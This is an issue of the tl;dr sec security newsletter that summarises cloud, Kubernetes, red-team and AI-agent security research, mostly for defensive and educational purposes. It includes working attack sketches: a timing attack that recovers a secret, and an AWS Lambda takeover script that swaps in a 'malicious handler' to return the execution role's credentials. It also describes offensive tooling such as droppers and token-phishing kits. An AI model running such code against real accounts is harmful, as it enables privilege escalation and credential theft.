[tl;dr sec] #272 – AI Agent Security, Kubernetes Security, ‘State of CloudSec’ Reports: Insights or Self-Owns?

Hey there,

I hope you’ve been doing well!

🥳 BSidesSF and RSA 2025


BSidesSF and RSA are coming up, which means… it’s time to get spammed by vendors.

I mean… hear about how an old company is now AI-first.

Errr I mean meet cool people and make new friends 😃 

I’m hoping there will be some great new marketing highlights, like last year’s guy hawking a security product while balancing on a board atop a cylinder in a straitjacket, choreographed ninjas dancing, or Keanu Reeves repping a product.

Don’t let me down marketing budgets 🤞 

Parties
I’m looking forward to Semgrep’s pre-BSidesSF party on Friday April 25 with Code Red, ProjectDiscovery, and Prophet Security at Emporium Arcade Bar. Hope to see you there!

You can see other Semgrep RSA events here, including my bud Tanya Janca doing signings of her new book Alice & Bob Learn Secure Coding.

See also this mega RSAC 2025 Party List or this Event Google Sheet by Chenxi Wang.

Sponsor

📣 The Battle against Bots:

How to protect your AI app


Modern bots are smarter than ever—executing JavaScript, storing cookies, rotating IPs, and even cracking CAPTCHAs with AI. As attacks grow more sophisticated, traditional detection just isn’t enough.

Enter WorkOS Radar—your all-in-one bot defense solution. With just a single API, you can instantly secure your signup flow against brute force attacks, leaked credentials, and disposable emails. Stop bots in their tracks and keep your real users safe.

👉 Protect Your App with WorkOS Radar 👈

Bots are ever evolving, so it’s nice to have a single mechanism to reduce risk from a broad variety of attack types 👍️ 

AppSec


secureCodeBox/secureCodeBox
An OWASP project by iteratec. A Kubernetes-based, modular toolchain that automates continuous security scans for software projects, integrating >15 OSS security tools.

Fun with Timing Attacks
Robbie Ostrow describes a practical timing attack against a function that takes user input and checks if it matches a secret using startsWith, exploiting early-exit behavior in the string comparison. He discusses an optimized guessing technique using Thompson Sampling and a Trie data structure, and provides an interactive demo using a web worker in your browser.
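
To make the core trick concrete, here’s a naive Python sketch (my own, not Robbie’s demo, which uses Thompson Sampling and a Trie to guess efficiently): a prefix check that exits early takes slightly longer the more leading characters you’ve guessed correctly, so you can recover the secret one character at a time. In practice the per-character signal is tiny and noisy, which is exactly why the post’s statistical approach matters.

```python
import string
import time

SECRET = "hunter2secret"  # stand-in for the server-side secret


def check_guess(guess: str) -> bool:
    # Early-exit comparison: startswith() bails at the first mismatching
    # character, so guesses with a longer correct prefix take slightly longer.
    return SECRET.startswith(guess)


def median_time_ns(guess: str, samples: int = 5000) -> int:
    timings = []
    for _ in range(samples):
        start = time.perf_counter_ns()
        check_guess(guess)
        timings.append(time.perf_counter_ns() - start)
    timings.sort()
    return timings[len(timings) // 2]  # median dampens scheduler noise


def recover_secret() -> str:
    known = ""
    for _ in range(len(SECRET)):  # demo shortcut: assume the length is known
        candidates = string.ascii_lowercase + string.digits
        known += max(candidates, key=lambda c: median_time_ns(known + c))
        print("best guess so far:", known)
    return known


if __name__ == "__main__":
    recover_secret()
```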

Exploring the DOMPurify library: Bypasses and Fixes
Kevin Mizu describes multiple DOMPurify bypasses, leveraging techniques like node flattening, HTML parsing states, and DOM clobbering. If you haven’t already heard of it, DOMPurify is a hardened client-side HTML sanitizer by cure53 that is generally excellent and widely recommended.

💡 This post contains some serious deep HTML nuance wizardry. Wow.

Sponsor

📣 Permiso Security’s CISO Guide to Detecting and Preventing Identity Attacks


This CISO guide addresses the key questions:

  • How much visibility does the security team have into human and non-human identity-related activities and potential threats within your organization?

  • What do cloud identity attacks look like across different cloud environments, and how do they differ from traditional on-premise identity attacks?

  • What best practice strategies are available for detecting, preventing, and remediating identity-based attacks?

  • Plus many more.

👉 Download 👈

Identity is both critical and tricky, so it’s great to see more guidance on getting visibility into identity-related risks and detection & response 👍️

Cloud Security


Understanding RCPs and SCPs in AWS: Choosing the Right Policy for your Security Needs
Fog Security’s Jason Kao discusses how to effectively combine Resource Control Policies (RCPs) and Service Control Policies (SCPs), including an example of how to migrate from an SCP to an RCP. Recommendations: use RCPs when you’re protecting resources in S3, STS, KMS, SQS, or Secrets Manager, enforcing consistent security standards for resources, running out of space or attachment slots in your SCPs, or you want to use NotResource in your policy. Use SCPs if you need to restrict a service not covered by RCPs or you want to use NotAction.
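
For a feel of what an RCP looks like, here’s a sketch (mine, not from the post) of a common data-perimeter-style policy that denies S3 access to principals outside your organization. The org ID and names are placeholders, and creating it via boto3 assumes a recent SDK that supports Type="RESOURCE_CONTROL_POLICY".

```python
import json

import boto3

# Deny S3 access unless the caller is a principal in our org (or an AWS service),
# no matter what any individual bucket policy says.
rcp = {
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "EnforceOrgIdentitiesForS3",
            "Effect": "Deny",
            "Principal": "*",  # RCPs restrict access *to* resources, so Principal is required
            "Action": "s3:*",
            "Resource": "*",
            "Condition": {
                "StringNotEqualsIfExists": {"aws:PrincipalOrgID": "o-examplefake"},
                "BoolIfExists": {"aws:PrincipalIsAWSService": "false"},
            },
        }
    ],
}

org = boto3.client("organizations")
org.create_policy(
    Name="enforce-org-identities-s3",
    Description="Deny S3 access from principals outside the organization",
    Type="RESOURCE_CONTROL_POLICY",
    Content=json.dumps(rcp),
)
```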

PowerUserAccess vs. AdministratorAccess from an attacker’s perspective
OffensAI’s Eduard Agavriloae describes how the AWS managed policy PowerUserAccess can be as dangerous as AdministratorAccess in complex AWS environments. For example, through PowerUserAccess, attackers can escalate privileges by modifying and invoking a Lambda function whose execution role has overly broad IAM permissions, using SSM SendCommand to exfiltrate access credentials from an EC2 instance with an overly permissive role, or altering a CloudFormation template deployed with AdministratorAccess to include a privilege escalation vector.
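
As a rough sketch of the Lambda path (illustrative, not code from the post): with PowerUserAccess you can overwrite a function’s code and invoke it, inheriting whatever its execution role can do. The function name is a placeholder, and it assumes the target uses the default Python handler lambda_function.lambda_handler.

```python
import io
import json
import zipfile

import boto3

# Replacement handler: just returns the execution role's temporary credentials,
# which Lambda exposes to the function as environment variables.
MALICIOUS_HANDLER = """\
import os

def lambda_handler(event, context):
    return {k: os.environ[k] for k in
            ("AWS_ACCESS_KEY_ID", "AWS_SECRET_ACCESS_KEY", "AWS_SESSION_TOKEN")}
"""

# Package the handler as an in-memory zip (assumes the target's configured
# handler is the Python default, lambda_function.lambda_handler)
buf = io.BytesIO()
with zipfile.ZipFile(buf, "w") as zf:
    zf.writestr("lambda_function.py", MALICIOUS_HANDLER)

lam = boto3.client("lambda")
lam.update_function_code(FunctionName="target-fn", ZipFile=buf.getvalue())  # placeholder name
lam.get_waiter("function_updated").wait(FunctionName="target-fn")
resp = lam.invoke(FunctionName="target-fn")
print(json.loads(resp["Payload"].read()))  # the privileged role's credentials
```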

State of ‘State of Cloud Security’ Reports: Insights or Self-Owns?
Rami McCarthy takes a critical look at “state of cloud security” reports published by CSPM vendors, highlighting how these reports may reflect more on the product’s effectiveness than the actual state of cloud security, and how certain stats might not represent real security risk, or might have a legit explanation for the observed state. “Often, the statistics presented are as much a reflection of limitation in collected or analyzed data, or the product, as any specific research perspective.”

💡 I like this angle, and in general I think as an industry we should do a better job at critically analyzing “state of the union” type reports, evaluations/benchmarks, etc.

Beyond Configuration Perfection: Redefining ‘Cloud Security’
Vectra AI’s Kat Traxler argues that focusing on cloud misconfigurations and least-privilege access alone can cause security teams to underinvest in other important areas, like threat detection and incident response, security automation and orchestration, and governance and risk management.

She also makes good points about the potentially questionable reliability of industry reports and metrics (e.g. X% of orgs have <something risky>), because a) this is based on one vendor’s customers (which may not be representative of all companies), and b) the sample size/which customers are included may vary from year to year, so stats might naturally fluctuate.

Container Security


Secure your container images with signature verification
Datadog’s Bowen Chen discusses implementing container image signing and verification to protect against supply chain attacks. Bowen explains how Datadog uses a gRPC signing service, and verifies signatures within containerd using a custom plugin to avoid API server latency issues. The post also covers considerations for adopting image signing, including organizational fit and integration complexity. See also this CNCF 2024 talk: Image Signing and Runtime Verification at Scale: Datadog’s Journey.
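
Datadog signs via an internal gRPC service and verifies inside containerd, but the underlying sign-then-verify pattern looks roughly like this sketch using the cosign CLI (assumes cosign 2.x, registry access, and a locally generated key pair; the image reference is a placeholder).

```python
import subprocess

IMAGE = "registry.example.com/team/app:1.2.3"  # placeholder; prefer signing by digest


def sign(image: str) -> None:
    # Signs the image and pushes the signature to the registry
    subprocess.run(["cosign", "sign", "--yes", "--key", "cosign.key", image], check=True)


def verify(image: str) -> bool:
    # Non-zero exit means no valid signature for this key: refuse to deploy the image
    result = subprocess.run(["cosign", "verify", "--key", "cosign.pub", image])
    return result.returncode == 0


if __name__ == "__main__":
    sign(IMAGE)
    print("signature verified:", verify(IMAGE))
```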

Command and Kubectl: Kubernetes Security for Pentesters and Defenders
Awesome BSides Reykjavik 2025 talk by Chainguard’s Mark Manning, covering an intro to k8s security, attack scenarios (e.g. compromising image registry credentials), useful tools, and defense and risk management.

Tools: go-pillage-registries, a pentester-focused Docker registry tool to enumerate and pull images, and vault-backdoored, a patched version of Vault that leaks all secrets via DNS.

IngressNightmare: 9.8 Critical Unauthenticated Remote Code Execution Vulnerabilities in Ingress NGINX
Wiz’s Nir Ohfeld, Ronen Shustin, Sagi Tzadik, and Hillai Ben-Sasson discovered multiple critical vulnerabilities in Ingress NGINX Controller for Kubernetes, allowing unauthenticated remote code execution and potential cluster takeover. They estimate ~40% of cloud environments are vulnerable.

The vulnerabilities stem from improper input sanitization, allowing attackers to inject arbitrary directives into the generated NGINX configuration, and to gain RCE by uploading a malicious shared library via NGINX client body buffering and loading it with an injected ssl_engine directive during configuration testing.

💡 The exploit chain for configuration injection → RCE is pretty rad 🤘Wiz bringing that IDF/8200 energy.

Blue Team


Cryakl/Ultimate-RAT-Collection
Samples of 450+ classic/modern trojan builders, including screenshots.

thinkst/defending-off-the-land
Various scripts and tools from Thinkst’s Jacob Torrey and Marco Slaviero’s BlackHat EU 2024 talk on deploying extant Windows OS features in non-traditional, defensive ways, including: an RDP Canarytoken, a WinRM Canarytoken, Scheduled Task alerter, AD login alerter, Windows Registry Monitor, Windows Service Canarytoken, and more.

ATT&CK Evaluations Library
MITRE’s ATT&CK Evaluations Library is a collection of adversary emulation plans, each providing a comprehensive approach to emulating a specific threat actor (ALPHV BlackCat, CL0P, DPRK, FIN7, LockBit, Sandworm, …), from initial access through exfiltration.

Each plan contains an intelligence summary, an operational flow covering a high-level summary of the captured scenario(s), and step-by-step procedures in both human and machine-readable formats, allowing for end-to-end scenario execution or individual technique testing.

Red Team


Rust for Malware Development
Bishop Fox’s Nick Cerne discusses Rust and C for malware development, highlighting Rust’s advantage of being more difficult to reverse engineer given the current functionality of Ghidra. He then demonstrates how to build a Rust-based malware dropper that enumerates processes, injects shellcode using remote mapping injection, and executes a Sliver C2 payload in the context of notepad.exe.

Phishing for Refresh Tokens
Zolder’s Rik Van Duijn describes extending Wesley’s Attacker In the Middle (AITM) attack tool using Cloudflare Workers to steal OAuth 2.0 authorization codes and exchange them for access and refresh tokens, enabling pivoting to other Microsoft resources. GitHub link.

BitM Up! Session Stealing in Seconds Using the Browser-in-the-Middle Technique
Google’s Truman Brown et al give an overview of Browser in the Middle (BitM) attacks, in which the victim’s session is served through an attacker-controlled browser displaying the legitimate site, making it challenging to distinguish from the real thing. BitM is an effective way to compromise sessions across web applications and bypass MFA. Unlike transparent proxies like Evilginx2 that require significant customization, BitM frameworks can target any website in seconds with minimal configuration.

Mitigations: requiring client certificates for authentication, or hardware-based MFA solutions like FIDO2 compatible security keys.

AI + Security


Quicklinks

nwiizo/tfmcp
By @nwiizo: a Terraform Model Context Protocol (MCP) tool, an experimental CLI that enables AI assistants to manage and operate Terraform environments. It supports reading Terraform configurations, analyzing plans, applying configurations, and managing state, with Claude Desktop integration.

AI Model Context Protocol (MCP) and Security
Cisco’s Omar Santos discusses the security implications of the Model Context Protocol (MCP), an open standard for connecting AI models to data sources and tools. Omar describes how security controls (e.g. authN/authZ, logging, …) can be added to the Agentic App <> MCP Server <> Tool flow.

The post includes some nice diagrams and tables covering key security considerations when implementing MCP transport mechanisms (authN/authZ, data security, network security), considerations when exposing tools (input validation, access control, error handling), and more.
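
As a tiny illustration of the input validation point, here’s a sketch of an MCP tool that only serves files under an allowlisted directory instead of trusting whatever path the model passes in. It assumes the MCP Python SDK’s FastMCP interface; the directory and server name are placeholders.

```python
from pathlib import Path

from mcp.server.fastmcp import FastMCP

ALLOWED_ROOT = Path("/srv/docs").resolve()  # placeholder directory
mcp = FastMCP("docs-server")


@mcp.tool()
def read_doc(relative_path: str) -> str:
    """Return the contents of a document under the allowed directory."""
    target = (ALLOWED_ROOT / relative_path).resolve()
    # Input validation: refuse anything that escapes the allowlisted root,
    # e.g. "../../etc/passwd"
    if not target.is_relative_to(ALLOWED_ROOT):
        raise ValueError("path outside the allowed directory")
    return target.read_text()


if __name__ == "__main__":
    mcp.run()
```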

AI agent authentication: it’s just OAuth
Maya Kaczorowski argues that existing OAuth standards are sufficient for authenticating and authorizing AI agents; entirely new solutions aren’t needed. OAuth provides a standardized way to delegate limited access to resources without sharing full credentials, and allows applications to request specific permissions on behalf of users, with those users explicitly approving what access they’re granting. Instead of giving an agent full access to an API, granular permission scopes in OAuth let you grant specific read or write permissions to particular resources.
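
A rough sketch of what that looks like in practice: a standard authorization code flow where the agent requests only a read scope, then calls the API with the delegated token. The endpoints, client ID, and scope names below are made up for illustration.

```python
from urllib.parse import urlencode

import requests

AUTHZ_ENDPOINT = "https://auth.example.com/authorize"  # placeholder provider
TOKEN_ENDPOINT = "https://auth.example.com/token"
CLIENT_ID = "calendar-agent"
REDIRECT_URI = "https://agent.example.com/callback"

# 1. Send the user to consent to specific, limited scopes (read-only here)
consent_url = AUTHZ_ENDPOINT + "?" + urlencode({
    "response_type": "code",
    "client_id": CLIENT_ID,
    "redirect_uri": REDIRECT_URI,
    "scope": "calendar.read",  # least privilege: no write scope requested
    "state": "opaque-anti-csrf-value",
})
print("User approves access here:", consent_url)


# 2. Exchange the returned authorization code for a token limited to those scopes
def exchange_code(code: str) -> str:
    resp = requests.post(TOKEN_ENDPOINT, data={
        "grant_type": "authorization_code",
        "code": code,
        "redirect_uri": REDIRECT_URI,
        "client_id": CLIENT_ID,
        "client_secret": "load-from-a-secrets-manager",
    }, timeout=10)
    resp.raise_for_status()
    return resp.json()["access_token"]


# 3. The agent acts with the delegated, scoped token rather than the user's credentials
def list_events(access_token: str) -> dict:
    resp = requests.get(
        "https://api.example.com/v1/events",
        headers={"Authorization": f"Bearer {access_token}"},
        timeout=10,
    )
    resp.raise_for_status()
    return resp.json()
```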

Building an Authorized RAG Chatbot with Oso Cloud
Oso’s Greg Sarjeant demonstrates how to build a permissions-aware RAG chatbot (GitHub repo) using Oso Cloud, Supabase, and OpenAI. The chatbot uses Oso Cloud to filter context based on user permissions before sending it to OpenAI, preventing unauthorized information disclosure.

See also here and Authorizing LLM responses by filtering vector embeddings.
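
Independent of Oso’s specific API, the pattern is: filter retrieved documents through an authorization check before they ever reach the prompt. Here’s a toy sketch, with a hypothetical is_authorized() standing in for the real permission service and a plain list standing in for the vector store.

```python
from dataclasses import dataclass


@dataclass
class Doc:
    id: str
    owner_team: str
    text: str


DOCS = [
    Doc("1", "finance", "Q3 revenue projections and board deck notes"),
    Doc("2", "eng", "Incident postmortem for the March outage"),
]


def is_authorized(user: str, action: str, doc: Doc) -> bool:
    """Placeholder for a real authorization call (e.g. an Oso Cloud check)."""
    team_of = {"alice": "finance", "bob": "eng"}
    return action == "read" and team_of.get(user) == doc.owner_team


def retrieve(query: str) -> list[Doc]:
    """Placeholder for vector similarity search."""
    return [d for d in DOCS if any(w in d.text.lower() for w in query.lower().split())]


def build_prompt(user: str, query: str) -> str:
    # Filter *before* the context reaches the LLM, so documents the user can't
    # read never make it into the model's answer.
    allowed = [d for d in retrieve(query) if is_authorized(user, "read", d)]
    context = "\n".join(d.text for d in allowed) or "No accessible documents."
    return f"Context:\n{context}\n\nQuestion: {query}"


print(build_prompt("bob", "march outage postmortem"))
```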

✉️ Wrapping Up


Have questions, comments, or feedback? Just reply directly, I’d love to hear from you.

If you find this newsletter useful and know other people who would too, I’d really appreciate if you’d forward it to them 🙏

Thanks for reading!

Cheers,
Clint
@clintgibler
